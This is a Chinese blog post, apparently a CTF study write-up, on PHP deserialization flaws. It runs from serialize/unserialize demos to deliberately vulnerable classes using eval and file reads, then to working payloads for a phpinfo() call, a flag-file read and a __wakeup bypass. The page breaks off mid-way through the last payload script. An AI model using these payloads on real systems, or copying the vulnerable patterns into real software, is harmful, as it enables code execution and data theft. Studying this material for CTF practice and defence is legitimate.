<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>php反序列化漏洞 | 书鱼</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="&amp;#x4E00;&amp;#x3001;&amp;#x53CD;&amp;#x5E8F;&amp;#x5217;&amp;#x5316;&amp;#x6F0F;&amp;#x6D1E;serialize()&amp;#xFF0C;unserialize()&amp;#x8FD9;&amp;#x4E24;&amp;#x4E2A;&amp;#x51FD;&amp;#x6570;&amp;#x8BF4;&amp;#x4E00;&amp;#x8BF4;&amp;#x5E8F;&amp;#x5217;&amp;#x5316;&amp;#x548C;&amp;#x53CD;">
<meta property="og:type" content="article">
<meta property="og:title" content="php反序列化漏洞">
<meta property="og:url" content="http://example.com/2019/07/20/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/index.html">
<meta property="og:site_name" content="书鱼">
<meta property="og:description" content="&amp;#x4E00;&amp;#x3001;&amp;#x53CD;&amp;#x5E8F;&amp;#x5217;&amp;#x5316;&amp;#x6F0F;&amp;#x6D1E;serialize()&amp;#xFF0C;unserialize()&amp;#x8FD9;&amp;#x4E24;&amp;#x4E2A;&amp;#x51FD;&amp;#x6570;&amp;#x8BF4;&amp;#x4E00;&amp;#x8BF4;&amp;#x5E8F;&amp;#x5217;&amp;#x5316;&amp;#x548C;&amp;#x53CD;">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/2019/07/20/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/1.png">
<meta property="og:image" content="http://example.com/2019/07/20/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/2.png">
<meta property="article:published_time" content="2019-07-19T20:51:00.000Z">
<meta property="article:modified_time" content="2020-11-24T04:51:22.047Z">
<meta property="article:author" content="st4ck">
<meta property="article:tag" content="PHP">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2019/07/20/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/1.png">
  
    <link rel="alternate" href="/atom.xml" title="书鱼" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 5.2.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">书鱼</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-php反序列化漏洞" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2019/07/20/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/" class="article-date">
  <time datetime="2019-07-19T20:51:00.000Z" itemprop="datePublished">2019-07-20</time>
</a>
    
  <div class="article-category">
    <a class="article-category-link" href="/categories/Web/">Web</a>
  </div>

  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      php反序列化漏洞
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <html><head></head><body><h3 id="&#x4E00;&#x3001;&#x53CD;&#x5E8F;&#x5217;&#x5316;&#x6F0F;&#x6D1E;"><a href="#&#x4E00;&#x3001;&#x53CD;&#x5E8F;&#x5217;&#x5316;&#x6F0F;&#x6D1E;" class="headerlink" title="&#x4E00;&#x3001;&#x53CD;&#x5E8F;&#x5217;&#x5316;&#x6F0F;&#x6D1E;"></a>&#x4E00;&#x3001;&#x53CD;&#x5E8F;&#x5217;&#x5316;&#x6F0F;&#x6D1E;</h3><h4 id="serialize-&#xFF0C;unserialize-&#x8FD9;&#x4E24;&#x4E2A;&#x51FD;&#x6570;"><a href="#serialize-&#xFF0C;unserialize-&#x8FD9;&#x4E24;&#x4E2A;&#x51FD;&#x6570;" class="headerlink" title="serialize()&#xFF0C;unserialize()&#x8FD9;&#x4E24;&#x4E2A;&#x51FD;&#x6570;"></a>serialize()&#xFF0C;unserialize()&#x8FD9;&#x4E24;&#x4E2A;&#x51FD;&#x6570;</h4><p>&#x8BF4;&#x4E00;&#x8BF4;&#x5E8F;&#x5217;&#x5316;&#x548C;&#x53CD;&#x5E8F;&#x5217;&#x5316;&#x7684;&#xFF0C;&#x5E8F;&#x5217;&#x5316;&#x8BF4;&#x901A;&#x4FD7;&#x70B9;&#x5C31;&#x662F;&#x628A;&#x4E00;&#x4E2A;&#x5BF9;&#x8C61;&#x53D8;&#x6210;&#x53EF;&#x4EE5;&#x4F20;&#x8F93;&#x7684;&#x5B57;&#x7B26;&#x4E32;&#x3002;&#x6BD4;&#x5982;&#x4E00;&#x4E2A;&#x7C7B;class,&#x5728;&#x5185;&#x5B58;&#x4E2D;&#x662F;&#x4E00;&#x4E2A;&#x7C7B;&#xFF0C;&#x4F46;&#x662F;&#x8981;&#x6301;&#x4E45;&#x5316;&#x6216;&#x8005;&#x8FDB;&#x884C;&#x4F20;&#x8F93;&#xFF0C;&#x5C31;&#x9700;&#x8981;&#x5E8F;&#x5217;&#x5316;&#xFF0C;&#x610F;&#x601D;&#x5176;&#x5B9E;&#x5C31;&#x662F;&#x628A;&#x7C7B;&#x5B58;&#x50A8;&#x8D77;&#x6765;&#x800C;&#x5DF2;&#x3002;</p>
<h5 id="demo1-&#x7C7B;&#x7684;&#x5E8F;&#x5217;&#x5316;"><a href="#demo1-&#x7C7B;&#x7684;&#x5E8F;&#x5217;&#x5316;" class="headerlink" title="demo1:&#x7C7B;&#x7684;&#x5E8F;&#x5217;&#x5316;"></a>demo1:&#x7C7B;&#x7684;&#x5E8F;&#x5217;&#x5316;</h5><a id="more"></a>


<figure class="highlight php hljs"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">&lt;?php</span></span><br><span class="line"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Car</span></span>{</span><br><span class="line">	<span class="hljs-keyword">var</span> <span class="hljs-variable">$size</span>;</span><br><span class="line">	<span class="hljs-keyword">var</span> <span class="hljs-variable">$color</span>;</span><br><span class="line">	<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">Car</span>(<span class="hljs-params"><span class="hljs-variable">$size</span>=<span class="hljs-string">&quot;big&quot;</span></span>)</span>{</span><br><span class="line">	<span class="hljs-keyword">$this</span>-&gt;size=<span class="hljs-variable">$size</span>;</span><br><span class="line">	}</span><br><span class="line">	<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">what_size</span>(<span class="hljs-params"></span>)</span>{</span><br><span class="line">	<span class="hljs-keyword">return</span> <span class="hljs-keyword">$this</span>-&gt;size;</span><br><span class="line">	}</span><br><span class="line">}</span><br><span class="line"><span class="hljs-variable">$mycar</span>=<span class="hljs-keyword">new</span> Car();</span><br><span class="line"><span class="hljs-variable">$mycar</span>-&gt;color=<span class="hljs-string">&quot;green&quot;</span>;	</span><br><span class="line"><span class="hljs-keyword">echo</span> var_dump(<span class="hljs-variable">$mycar</span>);</span><br><span class="line"><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line"><span class="hljs-keyword">echo</span> serialize(<span class="hljs-variable">$mycar</span>);</span><br><span class="line"><span class="hljs-meta">?&gt;</span></span><br></pre></td></tr></tbody></table></figure>
<p>&#x8F93;&#x51FA;</p>
<figure class="highlight plain hljs"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">object(Car)#1 (2) { [&quot;size&quot;]=&gt; string(3) &quot;big&quot; [&quot;color&quot;]=&gt; string(5) &quot;green&quot; }</span><br><span class="line">O:3:&quot;Car&quot;:2:{s:4:&quot;size&quot;;s:3:&quot;big&quot;;s:5:&quot;color&quot;;s:5:&quot;green&quot;;}</span><br></pre></td></tr></tbody></table></figure>
<p>&#x5176;&#x5B9E;&#x6211;&#x89C9;&#x5F97;&#x5E8F;&#x5217;&#x5316;&#x548C;var_dump&#x529F;&#x80FD;&#x7C7B;&#x4F3C;&#x5427;&#xFF0C;&#x53CD;&#x6B63;&#x5C31;&#x662F;&#x4E0D;&#x80FD;&#x6709;<br>&#xFF0C;&#x53CD;&#x5E8F;&#x5217;&#x5316;&#x5373;&#x628A;&#x5B57;&#x7B26;&#x4E32;<code>O:3:&quot;Car&quot;:2:{s:4:&quot;size&quot;;s:3:&quot;big&quot;;s:5:&quot;color&quot;;s:5:&quot;green&quot;;}</code>&#x8F6C;&#x4E3A;&#x7C7B;&#xFF0C;&#x4F46;&#x662F;&#x5982;&#x679C;&#x662F;&#x7C7B;&#xFF0C;&#x9700;&#x8981;&#x5148;&#x5B9A;&#x4E49;&#x7C7B;</p>
<h5 id="demo2-&#x7C7B;&#x7684;&#x53CD;&#x5E8F;&#x5217;&#x5316;"><a href="#demo2-&#x7C7B;&#x7684;&#x53CD;&#x5E8F;&#x5217;&#x5316;" class="headerlink" title="demo2:&#x7C7B;&#x7684;&#x53CD;&#x5E8F;&#x5217;&#x5316;"></a>demo2:&#x7C7B;&#x7684;&#x53CD;&#x5E8F;&#x5217;&#x5316;</h5><figure class="highlight php hljs"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">&lt;?php</span></span><br><span class="line"><span class="hljs-comment">#&#x7C7B;&#x53CD;&#x5E8F;&#x5217;&#x5316;</span></span><br><span class="line"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">kitty</span></span>{</span><br><span class="line">	<span class="hljs-keyword">var</span> <span class="hljs-variable">$age</span>;</span><br><span class="line">	<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">Car</span>(<span class="hljs-params"><span class="hljs-variable">$age</span>=<span class="hljs-string">&quot;18&quot;</span></span>)</span>{</span><br><span class="line">	<span class="hljs-keyword">$this</span>-&gt;size=<span class="hljs-variable">$size</span>;	</span><br><span class="line">	}</span><br><span class="line">}</span><br><span class="line"><span class="hljs-variable">$seriStr</span>=<span class="hljs-string">&apos;O:5:&quot;kitty&quot;:1:{s:3:&quot;age&quot;;s:2:&quot;18&quot;;}&apos;</span>;</span><br><span class="line"><span class="hljs-variable">$new_me</span>=unserialize(<span class="hljs-variable">$seriStr</span>);</span><br><span class="line"><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line"><span class="hljs-keyword">echo</span> var_dump(<span class="hljs-variable">$new_me</span>);</span><br><span class="line"><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line"><span class="hljs-keyword">echo</span> <span class="hljs-variable">$new_me</span>-&gt;age;</span><br><span class="line"><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line"><span class="hljs-meta">?&gt;</span></span><br></pre></td></tr></tbody></table></figure>
<p>&#x8F93;&#x51FA;</p>
<figure class="highlight plain hljs"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">object(kitty)#2 (1) { [&quot;age&quot;]=&gt; string(2) &quot;18&quot; }</span><br><span class="line">18</span><br></pre></td></tr></tbody></table></figure>
<h5 id="demo3-&#x6570;&#x7EC4;&#x7684;&#x5E8F;&#x5217;&#x5316;&#x548C;&#x53CD;&#x5E8F;&#x5217;&#x5316;"><a href="#demo3-&#x6570;&#x7EC4;&#x7684;&#x5E8F;&#x5217;&#x5316;&#x548C;&#x53CD;&#x5E8F;&#x5217;&#x5316;" class="headerlink" title="demo3:&#x6570;&#x7EC4;&#x7684;&#x5E8F;&#x5217;&#x5316;&#x548C;&#x53CD;&#x5E8F;&#x5217;&#x5316;"></a>demo3:&#x6570;&#x7EC4;&#x7684;&#x5E8F;&#x5217;&#x5316;&#x548C;&#x53CD;&#x5E8F;&#x5217;&#x5316;</h5><figure class="highlight php hljs"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">&lt;?php</span></span><br><span class="line"><span class="hljs-comment">#&#x6570;&#x7EC4;&#x5E8F;&#x5217;&#x5316;</span></span><br><span class="line"><span class="hljs-variable">$data</span>=[<span class="hljs-string">&apos;php&apos;</span>,<span class="hljs-string">&apos;java&apos;</span>,<span class="hljs-number">123</span>];</span><br><span class="line"><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line"><span class="hljs-keyword">echo</span> serialize(<span class="hljs-variable">$data</span>);</span><br><span class="line"></span><br><span class="line"><span class="hljs-comment">#&#x6570;&#x7EC4;&#x53CD;&#x5E8F;&#x5217;&#x5316;</span></span><br><span class="line"><span class="hljs-variable">$new_ar</span>=<span class="hljs-string">&apos;a:3:{i:0;s:5:&quot;kitty&quot;;i:1;s:4:&quot;java&quot;;i:2;s:6:&quot;python&quot;;}&apos;</span>;</span><br><span class="line"><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line"><span class="hljs-keyword">echo</span> var_dump(unserialize(<span class="hljs-variable">$new_ar</span>));</span><br><span class="line"><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line"><span class="hljs-keyword">echo</span> unserialize(<span class="hljs-variable">$new_ar</span>)[<span class="hljs-number">0</span>];</span><br><span class="line"><span class="hljs-meta">?&gt;</span></span><br></pre></td></tr></tbody></table></figure>
<p>&#x8F93;&#x51FA;</p>
<figure class="highlight plain hljs"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">a:3:{i:0;s:3:&quot;php&quot;;i:1;s:4:&quot;java&quot;;i:2;i:123;}</span><br><span class="line">array(3) { [0]=&gt; string(5) &quot;kitty&quot; [1]=&gt; string(4) &quot;java&quot; [2]=&gt; string(6) &quot;python&quot; }</span><br><span class="line">kitty</span><br></pre></td></tr></tbody></table></figure>
<p>&#x8BED;&#x6CD5;&#x89C4;&#x5219;<br><img src="1.png"></p>
<h3 id="&#x4E8C;&#x3001;&#x53CD;&#x5E8F;&#x5217;&#x5316;&#x6F0F;&#x6D1E;&#x4EA7;&#x751F;"><a href="#&#x4E8C;&#x3001;&#x53CD;&#x5E8F;&#x5217;&#x5316;&#x6F0F;&#x6D1E;&#x4EA7;&#x751F;" class="headerlink" title="&#x4E8C;&#x3001;&#x53CD;&#x5E8F;&#x5217;&#x5316;&#x6F0F;&#x6D1E;&#x4EA7;&#x751F;"></a>&#x4E8C;&#x3001;&#x53CD;&#x5E8F;&#x5217;&#x5316;&#x6F0F;&#x6D1E;&#x4EA7;&#x751F;</h3><p>&#x5176;&#x5B9E;&#x8FD8;&#x662F;&#x4E00;&#x4E2A;&#x53D8;&#x91CF;&#x8986;&#x76D6;&#x7684;&#x95EE;&#x9898;&#x5427;&#xFF0C;&#x6211;&#x4EEC;&#x4F20;&#x5165;&#x7684;&#x5B57;&#x7B26;&#x4E32;&#x53CD;&#x5E8F;&#x5217;&#x5316;&#xFF0C;&#x5BFC;&#x81F4;&#x63A7;&#x5236;&#x53C2;&#x6570;&#x6216;&#x8005;&#x4EFB;&#x610F;&#x4EE3;&#x7801;&#x6267;&#x884C;<br><img src="2.png"></p>
<h5 id="&#x4EE3;&#x7801;&#x6267;&#x884C;"><a href="#&#x4EE3;&#x7801;&#x6267;&#x884C;" class="headerlink" title="&#x4EE3;&#x7801;&#x6267;&#x884C;"></a>&#x4EE3;&#x7801;&#x6267;&#x884C;</h5><figure class="highlight php hljs"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">&lt;?php</span></span><br><span class="line"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Example</span> </span>{</span><br><span class="line">  <span class="hljs-keyword">var</span> <span class="hljs-variable">$var</span> = <span class="hljs-string">&quot;&quot;</span>;</span><br><span class="line">  <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>) </span>{</span><br><span class="line">    <span class="hljs-keyword">eval</span>(<span class="hljs-keyword">$this</span>-&gt;var);</span><br><span class="line">  }</span><br><span class="line">}</span><br><span class="line">unserialize(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&quot;saved_code&quot;</span>]);</span><br><span class="line"><span class="hljs-meta">?&gt;</span></span><br></pre></td></tr></tbody></table></figure>
<p>payload<code>http://localhost/ser.php?saved_code=O:7:%22Example%22:1:{s:3:%22var%22;s:10:%22phpinfo();%22;}</code></p>
<h5 id="jarvios&#x4F8B;&#x9898;&#xFF1A;"><a href="#jarvios&#x4F8B;&#x9898;&#xFF1A;" class="headerlink" title="jarvios&#x4F8B;&#x9898;&#xFF1A;"></a>jarvios&#x4F8B;&#x9898;&#xFF1A;</h5><p>&#x6E90;&#x7801;&#x6CC4;&#x9732;&#x7ED9;&#x4E86;&#x4E24;&#x4E2A;&#x6587;&#x4EF6;<br>index.php</p>
<figure class="highlight php hljs"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">&lt;?php</span> </span><br><span class="line">    <span class="hljs-keyword">require_once</span>(<span class="hljs-string">&apos;shield.php&apos;</span>);</span><br><span class="line">    <span class="hljs-variable">$x</span> = <span class="hljs-keyword">new</span> Shield();</span><br><span class="line">    <span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&apos;class&apos;</span>]) &amp;&amp; <span class="hljs-variable">$g</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&apos;class&apos;</span>];</span><br><span class="line">    <span class="hljs-keyword">if</span> (!<span class="hljs-keyword">empty</span>(<span class="hljs-variable">$g</span>)) {</span><br><span class="line">        <span class="hljs-variable">$x</span> = unserialize(<span class="hljs-variable">$g</span>);</span><br><span class="line">    }</span><br><span class="line">    <span class="hljs-keyword">echo</span> <span class="hljs-variable">$x</span>-&gt;readfile();</span><br><span class="line"><span class="hljs-meta">?&gt;</span></span><br></pre></td></tr></tbody></table></figure>
<p>shield.php</p>
<figure class="highlight php hljs"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">&lt;?php</span></span><br><span class="line"><span class="hljs-comment">//flag is in pctf.php</span></span><br><span class="line"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Shield</span> </span>{</span><br><span class="line">    <span class="hljs-keyword">public</span> <span class="hljs-variable">$file</span>;</span><br><span class="line">    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"><span class="hljs-variable">$filename</span> = <span class="hljs-string">&apos;&apos;</span></span>) </span>{</span><br><span class="line">        <span class="hljs-keyword">$this</span> -&gt; file = <span class="hljs-variable">$filename</span>;</span><br><span class="line">    }</span><br><span class="line">    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">readfile</span>(<span class="hljs-params"></span>) </span>{</span><br><span class="line">        <span class="hljs-keyword">if</span> (!<span class="hljs-keyword">empty</span>(<span class="hljs-keyword">$this</span>-&gt;file) &amp;&amp; stripos(<span class="hljs-keyword">$this</span>-&gt;file,<span class="hljs-string">&apos;..&apos;</span>)===<span class="hljs-literal">FALSE</span>  </span><br><span class="line">        &amp;&amp; stripos(<span class="hljs-keyword">$this</span>-&gt;file,<span class="hljs-string">&apos;/&apos;</span>)===<span class="hljs-literal">FALSE</span> &amp;&amp; stripos(<span class="hljs-keyword">$this</span>-&gt;file,<span class="hljs-string">&apos;\\&apos;</span>)==<span class="hljs-literal">FALSE</span>) {</span><br><span class="line">            <span class="hljs-keyword">return</span> @file_get_contents(<span class="hljs-keyword">$this</span>-&gt;file);</span><br><span class="line">        }</span><br><span class="line">    }</span><br><span class="line">}</span><br><span class="line"><span class="hljs-meta">?&gt;</span></span><br></pre></td></tr></tbody></table></figure>
<p>&#x8FD9;&#x91CC;&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x770B;&#x89C1;&#x53EA;&#x8981;&#x64CD;&#x63A7;$file&#x8FD9;&#x4E2A;&#x53C2;&#x6570;&#x4E3A;pctf.php&#x5C31;&#x53EF;&#x4EE5;&#x4E86;&#xFF0C;&#x8FD9;&#x91CC;construct&#x51FD;&#x6570;&#x5728;&#x5B9E;&#x4F8B;&#x88AB;&#x521B;&#x5EFA;&#x7684;&#x65F6;&#x5019;(&#x4E5F;&#x5C31;&#x662F;new Shield()&#x7684;&#x65F6;&#x5019;)&#x6267;&#x884C;&#xFF0C;&#x6240;&#x4EE5;&#x4E0D;&#x4F1A;&#x5F71;&#x54CD;&#x6211;&#x4EEC;&#x5BF9;$file&#x7684;&#x64CD;&#x4F5C;<br>payload<code>O:6:&quot;Shield&quot;:1:{s:4:&quot;file&quot;;s:8:&quot;pctf.php&quot;;} </code></p>
<h4 id="&#x201C;&#x767E;&#x5EA6;&#x676F;&#x201D;CTF&#x6BD4;&#x8D5B;-&#x5341;&#x6708;&#x573A;-Hash"><a href="#&#x201C;&#x767E;&#x5EA6;&#x676F;&#x201D;CTF&#x6BD4;&#x8D5B;-&#x5341;&#x6708;&#x573A;-Hash" class="headerlink" title="&#x201C;&#x767E;&#x5EA6;&#x676F;&#x201D;CTF&#x6BD4;&#x8D5B; &#x5341;&#x6708;&#x573A; Hash"></a>&#x201C;&#x767E;&#x5EA6;&#x676F;&#x201D;CTF&#x6BD4;&#x8D5B; &#x5341;&#x6708;&#x573A; Hash</h4><figure class="highlight php hljs"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">&lt;?php</span></span><br><span class="line"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Demo</span> </span>{</span><br><span class="line">    <span class="hljs-keyword">private</span> <span class="hljs-variable">$file</span> = <span class="hljs-string">&apos;Gu3ss_m3_h2h2.php&apos;</span>;</span><br><span class="line"></span><br><span class="line">    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"><span class="hljs-variable">$file</span></span>) </span>{</span><br><span class="line">        <span class="hljs-keyword">$this</span>-&gt;file = <span class="hljs-variable">$file</span>;</span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>) </span>{</span><br><span class="line">        <span class="hljs-keyword">echo</span> @highlight_file(<span class="hljs-keyword">$this</span>-&gt;file, <span class="hljs-literal">true</span>);</span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__wakeup</span>(<span class="hljs-params"></span>) </span>{</span><br><span class="line">        <span class="hljs-keyword">if</span> (<span class="hljs-keyword">$this</span>-&gt;file != <span class="hljs-string">&apos;Gu3ss_m3_h2h2.php&apos;</span>) {</span><br><span class="line">            <span class="hljs-comment">//the secret is in the f15g_1s_here.php</span></span><br><span class="line">            <span class="hljs-keyword">$this</span>-&gt;file = <span class="hljs-string">&apos;Gu3ss_m3_h2h2.php&apos;</span>;</span><br><span class="line">        }</span><br><span class="line">    }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&apos;var&apos;</span>])) {</span><br><span class="line">    <span class="hljs-variable">$var</span> = base64_decode(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&apos;var&apos;</span>]);</span><br><span class="line">    <span class="hljs-keyword">if</span> (preg_match(<span class="hljs-string">&apos;/[oc]:\d+:/i&apos;</span>, <span class="hljs-variable">$var</span>)) {</span><br><span class="line">        <span class="hljs-keyword">die</span>(<span class="hljs-string">&apos;stop hacking!&apos;</span>);</span><br><span class="line">    } <span class="hljs-keyword">else</span> {</span><br><span class="line"></span><br><span class="line">        @unserialize(<span class="hljs-variable">$var</span>);</span><br><span class="line">    }</span><br><span class="line">} <span class="hljs-keyword">else</span> {</span><br><span class="line">    highlight_file(<span class="hljs-string">&quot;Gu3ss_m3_h2h2.php&quot;</span>);</span><br><span class="line">}</span><br><span class="line"><span class="hljs-meta">?&gt;</span></span><br></pre></td></tr></tbody></table></figure>
<p>payload</p>
<figure class="highlight php hljs"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Demo</span> </span>{</span><br><span class="line">    <span class="hljs-keyword">private</span> <span class="hljs-variable">$file</span> = <span class="hljs-string">&apos;Gu3ss_m3_h2h2.php&apos;</span>;</span><br><span class="line">	</span><br><span class="line">	    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"><span class="hljs-variable">$file</span></span>) </span>{</span><br><span class="line">        <span class="hljs-keyword">$this</span>-&gt;file = <span class="hljs-variable">$file</span>;</span><br><span class="line">    }</span><br><span class="line">}</span><br><span class="line"><span class="hljs-variable">$a</span> = <span class="hljs-keyword">new</span> Demo(<span class="hljs-string">&apos;f15g_1s_here.php&apos;</span>);</span><br><span class="line"></span><br><span class="line"><span class="hljs-variable">$s</span> = serialize(<span class="hljs-variable">$a</span>);</span><br><span class="line"><span class="hljs-keyword">echo</span> <span class="hljs-variable">$s</span>;</span><br><span class="line"><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;\n&quot;</span>;</span><br><span class="line"><span class="hljs-variable">$s</span> = str_replace(<span 